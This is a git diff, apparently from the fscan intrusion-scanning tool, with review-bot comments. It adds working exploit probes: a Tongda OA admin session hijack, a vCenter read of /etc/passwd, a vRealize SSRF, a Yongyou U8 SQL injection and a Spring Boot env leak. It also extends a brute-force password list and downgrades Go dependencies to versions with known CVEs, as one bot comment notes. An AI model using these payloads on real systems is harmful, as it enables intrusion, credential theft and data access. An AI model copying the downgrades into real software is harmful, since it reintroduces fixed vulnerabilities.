diff --git a/WebScan/pocs/springboot-env-unauth2.yml b/WebScan/pocs/springboot-env-unauth2.yml new file mode 100644 index 0000000..6a78661 --- /dev/null +++ b/WebScan/pocs/springboot-env-unauth2.yml @@ -0,0 +1,9 @@ +name: poc-yaml-springboot-env-unauth +rules: + - method: GET + path: /actuator/env + expression: | + response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") +detail: + links: + - https://github.com/LandGrey/SpringBootVulExploit diff --git a/WebScan/pocs/tongda-user-session-disclosure.yml b/WebScan/pocs/tongda-user-session-disclosure.yml new file mode 100644 index 0000000..05768d9 --- /dev/null +++ b/WebScan/pocs/tongda-user-session-disclosure.yml @@ -0,0 +1,16 @@ +name: poc-yaml-tongda-user-session-disclosure +rules: + - method: GET + path: /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 + follow_redirects: false + expression: "true" + + - method: POST + path: /general/userinfo.php?UID=1 + follow_redirects: false + expression: | + response.status == 200 && response.body.bcontains(b"\"dept_name\":\"") && response.body.bcontains(b"\"online_flag\":") && response.headers["Content-Type"].contains("application/json") +detail: + author: kzaopa(https://github.com/kzaopa) + links: + - https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ \ No newline at end of file diff --git a/WebScan/pocs/vmware-vcenter-arbitrary-file-read2.yml b/WebScan/pocs/vmware-vcenter-arbitrary-file-read2.yml new file mode 100644 index 0000000..064aa10 --- /dev/null +++ b/WebScan/pocs/vmware-vcenter-arbitrary-file-read2.yml @@ -0,0 +1,11 @@ +name: poc-yaml-vmware-vcenter-arbitrary-file-read2 +rules: + - method: GET + path: /eam/vib?id=/etc/passwd + follow_redirects: false + expression: | + response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) +detail: + author: MrP01ntSun(https://github.com/MrPointSun) + links: + - https://t.co/LfvbyBUhF5 
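Review bot: Rule 1 has `expression: "true"`, so its only purpose is to have the server issue a session cookie bound to uid=1 that rule 2 then relies on, which works only if the engine's HTTP client carries cookies across rules (not visible here); a line in `detail`, e.g. `info: rule 1 seeds the session cookie, rule 2 reads the profile with it`, would make that dependency explicit. Rule 2 also checks `response.headers["Content-Type"]` where the other POCs use `response.content_type`.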
diff --git a/WebScan/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml b/WebScan/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml new file mode 100644 index 0000000..6b27d65 --- /dev/null +++ b/WebScan/pocs/vmware-vrealize-cve-2021-21975-ssrf.yml @@ -0,0 +1,15 @@ +name: poc-yaml-vmware-vrealize-cve-2021-21975-ssrf +rules: + - method: POST + path: /casa/nodes/thumbprints + headers: + Content-Type: application/json + body: | + ["127.0.0.1:443/ui/"] + follow_redirects: true + expression: | + response.status == 200 && response.body.bcontains(bytes("vRealize Operations Manager")) +detail: + author: Loneyer + links: + - https://www.vmware.com/security/advisories/VMSA-2021-0004.html \ No newline at end of file diff --git a/WebScan/pocs/yongyou-u8-oa-sqli.yml b/WebScan/pocs/yongyou-u8-oa-sqli.yml new file mode 100644 index 0000000..cfe638d --- /dev/null +++ b/WebScan/pocs/yongyou-u8-oa-sqli.yml @@ -0,0 +1,13 @@ +name: poc-yaml-yongyou-u8-oa-sqli +set: + rand: randomInt(200000000, 220000000) +rules: + - method: GET + path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}})) + follow_redirects: false + expression: | + response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) +detail: + author: kzaopa(https://github.com/kzaopa) + links: + - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8B%20U8%20OA%20test.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html diff --git a/common/config.go b/common/config.go index 0dd05c3..fc77632 100644 --- a/common/config.go +++ b/common/config.go 
@@ -10,7 +10,7 @@ var Userdict = map[string][]string{ "mongodb": {"root", "admin"}, } -var Passwords = []string{"123456", "admin", "admin123", "root", "", "pass123", "pass@123", "password", "123123", "654321", "111111", "123", "1", "admin@123", "Admin@123", "admin123!@#", "{user}", "{user}1", "{user}111", "{user}123", "{user}@123", "{user}_123", "{user}#123", "{user}@111", "{user}@2019", "P@ssw0rd!", "P@ssw0rd", "Passw0rd", "qwe123", "12345678", "test", "test123", "123qwe!@#", "123456789", "123321", "666666", "a123456.", "123456~a", "000000", "1234567890", "8888888", "!QAZ2wsx", "1qaz2wsx", "abc123", "abc123456", "1qaz@WSX", "a11111", "a12345", "Aa1234", "Aa1234.", "Aa12345", "a123456", "a123123", "Aa123123", "Aa123456", "Aa12345.", "sysadmin", "system", "huawei"} +var Passwords = []string{"123456", "admin", "admin123", "root", "", "pass123", "pass@123", "password", "123123", "654321", "111111", "123", "1", "admin@123", "Admin@123", "admin123!@#", "{user}", "{user}1", "{user}111", "{user}123", "{user}@123", "{user}_123", "{user}#123", "{user}@111", "{user}@2019", "P@ssw0rd!", "P@ssword", "p@ssword", "P@ssw0rd", "Passw0rd", "qwe123", "12345678", "test", "test123", "123qwe!@#", "123456789", "123321", "666666", "a123456.", "123456~a", "000000", "1234567890", "8888888", "!QAZ2wsx", "1qaz2wsx", "abc123", "abc123456", "1qaz@WSX", "a11111", "a12345", "Aa1234", "Aa1234.", "Aa12345", "a123456", "a123123", "Aa123123", "Aa123456", "Aa12345.", "sysadmin", "system", "huawei"} var PORTList = map[string]int{ "ftp": 21, @@ -25,13 +25,13 @@ var PORTList = map[string]int{ "ms17010": 1000001, "cve20200796": 1000002, "web": 1000003, - "elastic": 9200, - "findnet": 135, - "netbios": 139, - "all": 0, - "portscan": 0, - "icmp": 0, - "main": 0, + //"elastic": 9200, + "findnet": 135, + "netbios": 139, + "all": 0, + "portscan": 0, + "icmp": 0, + "main": 0, } var Outputfile = getpath() + "result.txt" 
@@ -69,18 +69,21 @@ type PocInfo struct { CeyeDomain string } -var TmpOutputfile string -var TmpSave bool -var IsPing bool -var Ping bool -var Pocinfo PocInfo -var IsWebCan bool -var RedisFile string -var RedisShell string -var Userfile string -var Passfile string -var HostFile string -var Threads int -var URL string -var UrlFile string -var Urls []string +var ( + TmpOutputfile string + TmpSave bool + IsPing bool + Ping bool + Pocinfo PocInfo + IsWebCan bool + RedisFile string + RedisShell string + Userfile string + Passfile string + HostFile string + Threads int + URL string + UrlFile string + Urls []string + NoPorts string +) diff --git a/common/flag.go b/common/flag.go index aca9759..730fb30 100644 --- a/common/flag.go +++ b/common/flag.go @@ -11,7 +11,7 @@ func Banner() { / /_\/____/ __|/ __| '__/ _` + "`" + ` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ - fscan version: 1.5.1.2 + fscan version: 1.6.0 ` print(banner) } @@ -20,6 +20,7 @@ func Flag(Info *HostInfo) { Banner() flag.StringVar(&Info.Host, "h", "", "IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12") flag.StringVar(&Info.Ports, "p", DefaultPorts, "Select a port,for example: 22 | 1-65535 | 22,80,3306") + flag.StringVar(&NoPorts, "pn", "", "the ports no scan,as: -pn 445") flag.StringVar(&Info.Command, "c", "", "exec command (ssh)") flag.StringVar(&Info.Domain, "domain", "", "smb domain") flag.StringVar(&Info.Username, "user", "", "username") @@ -44,6 +45,6 @@ func Flag(Info *HostInfo) { flag.StringVar(&Pocinfo.Proxy, "proxy", "", "set poc proxy, -proxy http://127.0.0.1:8080") flag.StringVar(&Pocinfo.Cookie, "cookie", "", "set poc cookie") flag.Int64Var(&Pocinfo.Timeout, "wt", 5, "Set web timeout") - flag.IntVar(&Pocinfo.Num, "Num", 20, "poc rate") + flag.IntVar(&Pocinfo.Num, "num", 20, "poc rate") flag.Parse() } diff --git a/common/log.go b/common/log.go index 44cf509..6bf1000 100644 
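Review bot: The help string `"the ports no scan,as: -pn 445"` is ungrammatical and does not tell the user that the value goes through the same parser as `-p`, so ranges and lists are accepted. Suggest `flag.StringVar(&NoPorts, "pn", "", "ports to skip, same syntax as -p, e.g. -pn 445 or -pn 135-139,445")`. Flag's body continues outside the hunk.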
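Review bot: Renaming the flag from `-Num` to `-num` breaks every existing script or wrapper that passes `-Num`, since the flag package treats it as an unknown flag and exits. If the lowercase form is wanted, register the old name as an alias for at least one release, `flag.IntVar(&Pocinfo.Num, "Num", 20, "poc rate (deprecated, use -num)")` alongside the new line, and mention the rename in the release notes.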
--- a/common/log.go
+++ b/common/log.go
@@ -15,10 +15,10 @@ var Start = true
 var LogSucTime int64
 var LogErrTime int64
 var WaitTime int64
-var Logwg sync.WaitGroup
+var LogWG sync.WaitGroup
 func LogSuccess(result string) {
- Logwg.Add(1)
+ LogWG.Add(1)
 LogSucTime = time.Now().Unix()
 if Start {
 go SaveLog()
@@ -33,7 +33,7 @@ func SaveLog() {
 if IsSave {
 WriteFile(result, Outputfile)
 }
- Logwg.Done()
+ LogWG.Done()
 }
 }
diff --git a/go.mod b/go.mod
index 3b1902d..0970ace 100644
--- a/go.mod
+++ b/go.mod
@@ -5,14 +5,14 @@ go 1.16
 require (
 github.com/denisenkom/go-mssqldb v0.10.0
 github.com/go-sql-driver/mysql v1.6.0
- github.com/golang/protobuf v1.5.2
- github.com/google/cel-go v0.7.3
+ github.com/golang/protobuf v1.3.4
+ github.com/google/cel-go v0.6.0
 github.com/jlaffaye/ftp v0.0.0-20210307004419-5d4190119067
- github.com/lib/pq v1.10.0
+ github.com/lib/pq v1.10.1
 github.com/stacktitan/smb v0.0.0-20190531122847-da9a425dceb8
- golang.org/x/crypto v0.0.0-20210415154028-4f45737414dc
- golang.org/x/net v0.0.0-20210420072503-d25e30425868
- golang.org/x/text v0.3.6
- google.golang.org/genproto v0.0.0-20210416161957-9910b6c460de
+ golang.org/x/crypto v0.0.0-20190325154230-a5d413f7728c
+ golang.org/x/net v0.0.0-20200301022130-244492dfa37a
+ golang.org/x/text v0.3.2
+ google.golang.org/genproto v0.0.0-20200416231807-8751e049a2a0
 gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b
 )
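Review bot: This go.mod hunk moves several dependencies backwards by one to two years — `golang.org/x/crypto` to a March-2019 snapshot, `golang.org/x/net` to March 2020, `golang.org/x/text` 0.3.6→0.3.2, `cel-go` 0.7.3→0.6.0, `protobuf` 1.5.2→1.3.4 — and nothing in the commit says why. For a tool whose SSH brute-force goes through `x/crypto/ssh` and whose web module decodes bytes returned by arbitrary scanned hosts, that reintroduces known fixed bugs: the `x/crypto/ssh` signature-verification panic (CVE-2020-9283) was fixed in February 2020 and the `x/text` `encoding/unicode` infinite loop (CVE-2020-14040) in 0.3.3, both newer than the versions pinned here. If the downgrade is needed to satisfy cel-go, pin only that module and keep the `x/*` packages at their previous versions, and run `go mod verify` plus a vulnerability check before merging.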